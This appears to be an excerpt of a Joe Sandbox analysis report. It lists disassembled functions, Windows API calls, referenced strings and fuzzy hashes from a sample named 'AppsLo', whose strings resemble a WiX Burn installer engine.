Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,008A4B12,?,?,008EB488,?,00000001,00000000,00000000), ref: 008B404C

Strings

clbcatq.dll, xrefs: 008B4185
Failed to get non-session specific TEMP folder., xrefs: 008B40F6
log, xrefs: 008B3FF3
Failed to get current directory., xrefs: 008B402E
Failed to copy log extension to extension., xrefs: 008B4191
msasn1.dll, xrefs: 008B4162, 008B41A3
Setup, xrefs: 008B3FF9
feclient.dll, xrefs: 008B3FAF, 008B405C
Failed to copy full log path to prefix., xrefs: 008B41AF
Failed to copy log path to prefix., xrefs: 008B416E
crypt32.dll, xrefs: 008B3FF2, 008B4057, 008B405F, 008B40C6, 008B4100, 008B4141, 008B4160, 008B419E, 008B41C8
Failed to open log: %ls, xrefs: 008B40C8

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: 490207b2b5697c848147667a62b0bde209d5b63e9f9a5a470d76ef300fbad0c7
Instruction ID: 48700df8b13aa9aa1716c5fecde82e58c3d7345c4b3cc0b95d941dffdddfa560
Opcode Fuzzy Hash: 490207b2b5697c848147667a62b0bde209d5b63e9f9a5a470d76ef300fbad0c7
Instruction Fuzzy Hash: 3861A271A00A1ABADF21AF79CC43BBA77A8FF15340B045555FD00DB352EB71ED908691

Function 008A6DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,008A5445,00000006,?,008A82B9,?,?,?,00000000,00000000,00000001), ref: 008A6DC8

Part of subcall function 008A56A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,008A6595,008A6595,?,008A563D,?,?,00000000), ref: 008A56E5
Part of subcall function 008A56A9: GetLastError.KERNEL32(?,008A563D,?,?,00000000,?,?,008A6595,?,008A7F02,?,?,?,?,?), ref: 008A5714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,008A82B9), ref: 008A6F59

Strings

Setting string variable '%ls' to value '%ls', xrefs: 008A6EED
Attempt to set built-in variable value: %ls, xrefs: 008A6E56
Unsetting variable '%ls', xrefs: 008A6F15
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 008A6F6B
Failed to set value of variable: %ls, xrefs: 008A6F41
Setting numeric variable '%ls' to value %lld, xrefs: 008A6EFA
variable.cpp, xrefs: 008A6E4B
Failed to find variable value '%ls'., xrefs: 008A6DE3
Failed to insert variable '%ls'., xrefs: 008A6E0D
Setting hidden variable '%ls', xrefs: 008A6E86
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 008A6ED0

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 61ea766e10222315c98011b8a3a27f2ab5d50bfa69a62a4e012203ae6b08da9b
Instruction ID: 14d66ff322eb1e0d6d7c32341efb2b7a2787ae1748dbc47503673486907cf48b
Opcode Fuzzy Hash: 61ea766e10222315c98011b8a3a27f2ab5d50bfa69a62a4e012203ae6b08da9b
Instruction Fuzzy Hash: AB511971A00255ABEB309F29DC4AF6B3BA8FB53714F280019F814E6685E675DC71CAE1

Function 008B2C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 008B2C8A

Strings

Failed to add dependent bundle provider key to ignore dependents., xrefs: 008B2DF4
Failed to add registration action for dependent related bundle., xrefs: 008B2F8E
Failed to add dependents ignored from command-line., xrefs: 008B2D3F
Failed to check for remaining dependents during planning., xrefs: 008B2E30
wininet.dll, xrefs: 008B2ED7
Failed to add self-dependent to ignore dependents., xrefs: 008B2D0E
Failed to add registration action for self dependent., xrefs: 008B2F57
Failed to allocate registration action., xrefs: 008B2CF3
crypt32.dll, xrefs: 008B2CD5, 008B2DCF, 008B2EC4, 008B2F39
Failed to create the string dictionary., xrefs: 008B2CC3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
API String ID: 1825529933-1705955799
Opcode ID: 5112563a17c142288f901832615137436c375f93c4cada626d5caae8e20a700b
Instruction ID: a8717e6c6f70dda48a6837548a005334e4c3e5f5a28a02e6b90a8cd37ff4ced5
Opcode Fuzzy Hash: 5112563a17c142288f901832615137436c375f93c4cada626d5caae8e20a700b
Instruction Fuzzy Hash: 00B15970A0061AEBDF2ADF69C881AEEBBB5FF04710F108169F815EA351CB34D950CB91

Function 008BF90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 008BF947
UuidCreate.RPCRT4(?), ref: 008BFA2A
StringFromGUID2.OLE32(?,?,00000027), ref: 008BFA4B
LeaveCriticalSection.KERNEL32(?,?), ref: 008BFAF4

Strings

update\%ls, xrefs: 008BF9A3
Failed to recreate command-line for update bundle., xrefs: 008BFA12
Failed to set update bundle., xrefs: 008BFACE
Failed to default local update source, xrefs: 008BF9B7
Failed to convert bundle update guid into string., xrefs: 008BFA6A
userForApplication.cpp, xrefs: 008BFA60
Failed to create bundle update guid., xrefs: 008BFA37

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$CreateEnterFromLeaveStringUuid
String ID: userForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
API String ID: 171215650-2594647487
Opcode ID: b93c76f1cab21cdee5c36a6a3c66b188dade168c23c8a843a80ddc349c310562
Instruction ID: 4c6e456321a79086ad29fe9ce2df7d9106f992074789b74e354edb932309fa5b
Opcode Fuzzy Hash: b93c76f1cab21cdee5c36a6a3c66b188dade168c23c8a843a80ddc349c310562
Instruction Fuzzy Hash: AB616931940219ABCF269FA4CC45FEABBB4FB08724F154179FA09EB252D7719C50CB91

Function 008A4AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 008A4C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008A4C75

Strings

Failed to open log., xrefs: 008A4B18
Failed to create the message window., xrefs: 008A4B98
WixBundleLayoutDirectory, xrefs: 008A4BF5
Failed to query registration., xrefs: 008A4BAE
Failed to set action variables., xrefs: 008A4BC4
Failed to check global conditions, xrefs: 008A4B49
Failed while running , xrefs: 008A4C2A
Failed to set registration variables., xrefs: 008A4BDE
Failed to set layout directory variable to value provided from command-line., xrefs: 008A4C06

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: 6adf5340b43ca50b6bff5bb36f7992315faf5f2098861987437896e7ec2be53e
Instruction ID: a1ddb8047cd9477a4d37060e848027c90788be74eb32c45c6b565c92c63231d7
Opcode Fuzzy Hash: 6adf5340b43ca50b6bff5bb36f7992315faf5f2098861987437896e7ec2be53e
Instruction Fuzzy Hash: 2141F43160162FBBEF166A64CC45FABB66CFB42764F001211B818D6A50DBF4EC119AE1

Function 008BF051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 008BF06E
LeaveCriticalSection.KERNEL32(?), ref: 008BF19B

Strings

UX requested unknown approved exe with id: %ls, xrefs: 008BF0CE
user is active, cannot change user state., xrefs: 008BF089
Failed to copy the arguments., xrefs: 008BF12D
Failed to copy the id., xrefs: 008BF100
Failed to post launch approved exe message., xrefs: 008BF186
userForApplication.cpp, xrefs: 008BF17C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: user is active, cannot change user state.$userForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: 67a939a45cb5ddc02729e9229b5cf510e86c863d0868f09a79edff2d201f1ed0
Instruction ID: 66e1091c7ca43f8d4ce3e34171092cbbdddf0afc993af3f2f794b2dd8734dba5
Opcode Fuzzy Hash: 67a939a45cb5ddc02729e9229b5cf510e86c863d0868f09a79edff2d201f1ed0
Instruction Fuzzy Hash: 6E318572640666EBDB229F68DC45EAB7798FF04720B018925BE04EF352D775DD008691

Function 008B969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,008BA7D4,00000000,00000000,00000000,?,00000000), ref: 008B96B8
GetLastError.KERNEL32(?,008BA7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008B96C6

Part of subcall function 008E4102: Sleep.KERNEL32(?,00000000,?,008B85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,008A4DBC), ref: 008E4119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008B97A4

Strings

Failed to open container in working path: %ls, xrefs: 008B96F5
Moving, xrefs: 008B973A
Failed to verify container hash: %ls, xrefs: 008B9727
Failed to move %ls to %ls, xrefs: 008B977C
Failed to copy %ls to %ls, xrefs: 008B9792
cache.cpp, xrefs: 008B96EA
%ls container from working path '%ls' to path '%ls', xrefs: 008B974F
Copying, xrefs: 008B9743, 008B974E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 1275171361-1187406825
Opcode ID: 357873401652ef8126e6d5bfbb2031dfef2487610b9db4cd294df98ec28970ce
Instruction ID: a589bc7f84e00ef11331fe9a5fed7a868b7f30fc6406d4e3378b2f8658b5b5ff
Opcode Fuzzy Hash: 357873401652ef8126e6d5bfbb2031dfef2487610b9db4cd294df98ec28970ce
Instruction Fuzzy Hash: D6213932A406697BEA321E298C46FBB3598FF42B60F110110FF54FE381D6A59C0185E6

Function 008A6F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 008A6FB2
LeaveCriticalSection.KERNEL32(?), ref: 008A71BE

Strings

Failed to read variable literal flag., xrefs: 008A7199
Failed to read variable included flag., xrefs: 008A71AE
Unsupported variable type., xrefs: 008A7184
Failed to read variable value as number., xrefs: 008A7178
Failed to read variable count., xrefs: 008A6FD2
Failed to read variable value as string., xrefs: 008A718B
Failed to read variable value type., xrefs: 008A71A0
Failed to set variable value., xrefs: 008A7171
Failed to read variable name., xrefs: 008A71A7
Failed to set variable., xrefs: 008A7192

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-528957463
Opcode ID: e5a8d77ea8714156a5863ba8fa04758718fe865a8f496743f81312687ce70044
Instruction ID: dbc1453e4699ad57937a9b3c9cc9a2e7d0dfbc6cb9647ca9fb444078b4ae9187
Opcode Fuzzy Hash: e5a8d77ea8714156a5863ba8fa04758718fe865a8f496743f81312687ce70044
Instruction Fuzzy Hash: B0719F71C0425EABEF11DEA8CC41EAEBBBDFB42714F104126F910E6650D635DE14ABA1

Function 008E44D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 008E4550
GetLastError.KERNEL32 ref: 008E4566
GetFileSizeEx.KERNEL32(00000000,?), ref: 008E45BF
GetLastError.KERNEL32 ref: 008E45C9
SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 008E461D
GetLastError.KERNEL32 ref: 008E4628
ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 008E4717
CloseHandle.KERNEL32(?), ref: 008E478A

Strings

fileutil.cpp, xrefs: 008E44F1, 008E45A8, 008E45E9, 008E476D

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
String ID: fileutil.cpp
API String ID: 3286166115-2967768451
Opcode ID: 7d441647e2c5c4963fc612f9ef35204eaeda94de438c3b6e3063b4d89938845e
Instruction ID: 09a108161d2e369a09bcc8d3d126c4be6920b574c8e469e87e74e08bcf74c34b
Opcode Fuzzy Hash: 7d441647e2c5c4963fc612f9ef35204eaeda94de438c3b6e3063b4d89938845e
Instruction Fuzzy Hash: 3D812832A402AAEBEB218E5B8C45B6F7698FF43764F211129FD1DEB290D774DD0086D1

Function 008A3076 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 008A30C1
GetLastError.KERNEL32 ref: 008A30C7
ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 008A3121
GetLastError.KERNEL32 ref: 008A3127
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008A31DB
GetLastError.KERNEL32 ref: 008A31E5
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 008A323B
GetLastError.KERNEL32 ref: 008A3245

Strings

@, xrefs: 008A309B
pathutil.cpp, xrefs: 008A30EB

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: @$pathutil.cpp
API String ID: 1547313835-3022285739
Opcode ID: 3f7429c50efe51ffd9825b2362bc49862e50d41501a5644ab6c24beac7884dac
Instruction ID: 98907ace03d9328f1238714e7d0bda9c7fea782509cd25a8bd543e00c1ad986c
Opcode Fuzzy Hash: 3f7429c50efe51ffd9825b2362bc49862e50d41501a5644ab6c24beac7884dac
Instruction Fuzzy Hash: 6361B173D0062ABBEB219AE48844B9EBAA8FF06761F114165FE10FB650E735DF0087D0

Function 008A2DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 008A2E5F
GetLastError.KERNEL32 ref: 008A2E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 008A2F09
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 008A2F96
GetLastError.KERNEL32 ref: 008A2FA3
Sleep.KERNEL32(00000064), ref: 008A2FB7
CloseHandle.KERNEL32(?), ref: 008A301F

Strings

pathutil.cpp, xrefs: 008A2E8D
4#v, xrefs: 008A2E5F
%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 008A2F66

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4#v$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-1777530710
Opcode ID: eb055690ef2ac9b83b075536da12637ac380f61bfb3206436daf9bf89596bcc4
Instruction ID: 3da84faa539eb02fcc9a6ae8370fd02d55dc477143e7d3742c0f39f971437168
Opcode Fuzzy Hash: eb055690ef2ac9b83b075536da12637ac380f61bfb3206436daf9bf89596bcc4
Instruction Fuzzy Hash: FB716472D01529ABEB319F99DC89BAAB3B8FB09710F000195FA14E7591D7749E80CF91

Function 008E6D50 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 165COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,7622DFD0,?,008E72C8,?,?), ref: 008E6DA6
SysFreeString.OLEAUT32(00000000), ref: 008E6E11
SysFreeString.OLEAUT32(00000000), ref: 008E6E89
SysFreeString.OLEAUT32(00000000), ref: 008E6EC8

Strings

scheme, xrefs: 008E6DB9
term, xrefs: 008E6DD9
label, xrefs: 008E6D98
`Dv, xrefs: 008E6E11, 008E6E89, 008E6EC8

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$Free$Compare
String ID: `Dv$label$scheme$term
API String ID: 1324494773-22456348
Opcode ID: 41c917839c6fddee2331acc67eb424e9cca5b99896833f2dc619341c0fd20d0b
Instruction ID: abfa5eefe24f6e8fc3e1a718622c18e46e2c80e3cc5a6e7f0b84811bc7eb1be0
Opcode Fuzzy Hash: 41c917839c6fddee2331acc67eb424e9cca5b99896833f2dc619341c0fd20d0b
Instruction Fuzzy Hash: 9151813590125AFBCB15CB95CC45FAEBBB4FF15360F2402A8E520E71A0E7319E20DB50

Function 008B4D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 008B4DC0
StringFromGUID2.OLE32(?,?,00000027), ref: 008B4DEF
UuidCreate.RPCRT4(?), ref: 008B4E3A
StringFromGUID2.OLE32(?,?,00000027), ref: 008B4E66

Strings

Failed to allocate pipe secret., xrefs: 008B4E8F
BurnPipe.%s, xrefs: 008B4E1B
Failed to create pipe guid., xrefs: 008B4DCD
Failed to convert pipe guid into string., xrefs: 008B4E0C
pipe.cpp, xrefs: 008B4E00, 008B4E4D
Failed to allocate pipe name., xrefs: 008B4E2F

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: 00439e344b3e1b13b7451eb5a3cb8ff66e24fb56733afa9c340e4500ec4da9d4
Instruction ID: 049f2aa0ecf4d86aac96b169082bb339d28e32a583b80090c3ae6b5c1aecc32c
Opcode Fuzzy Hash: 00439e344b3e1b13b7451eb5a3cb8ff66e24fb56733afa9c340e4500ec4da9d4
Instruction Fuzzy Hash: FC414A72D0030CABDB21DBE9C946EEEB7F8FB45720F200126E905EB351D6759945CBA1

Function 008BEA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,008A548E,?,?), ref: 008BEA9D
GetLastError.KERNEL32(?,008A548E,?,?), ref: 008BEAAA
CreateThread.KERNEL32(00000000,00000000,008BE7B4,?,00000000,00000000), ref: 008BEB03
GetLastError.KERNEL32(?,008A548E,?,?), ref: 008BEB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,008A548E,?,?), ref: 008BEB4B
CloseHandle.KERNEL32(00000000,?,008A548E,?,?), ref: 008BEB6A
CloseHandle.KERNEL32(?,?,008A548E,?,?), ref: 008BEB77

Strings

uithread.cpp, xrefs: 008BEACB, 008BEB31
Failed to create initialization event., xrefs: 008BEAD5
Failed to create the UI thread., xrefs: 008BEB3B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
